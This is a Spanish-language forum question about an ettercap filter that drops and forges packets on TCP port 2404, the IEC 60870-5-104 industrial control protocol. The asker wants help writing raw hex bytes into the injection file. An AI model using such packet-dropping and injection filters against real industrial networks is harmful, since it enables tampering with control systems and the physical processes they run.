if (ip.proto == TCP) {
if (tcp.src == 2404 || tcp.dst == 2404) {
if (DATA.data+6 == 0x64 && DATA.data+8 == 0x07) {
msg(" pos activation - drop \n");
drop();
inject("./fake_pkt");
}
}
}
Podemos soltar e inyectar paquetes con éxito usando el filtro ettercap anterior.
El contenido del archivo fake_pkt
es "\x68\x04\x07\x00\x00\x00"
.
El tamaño del contenido inyectado es de 24 caracteres y el contenido del paquete inyectado es "\x68\x04\x07\x00\x00\x00"
, como texto.
Pero nuestro objetivo es enviar un paquete binario ( 68,04,07,00,00,00
) del tamaño igual a 6 bytes.
¿Puedo saber cómo escribir valores hexadecimales en el archivo fake_pkt para lograr nuestro objetivo?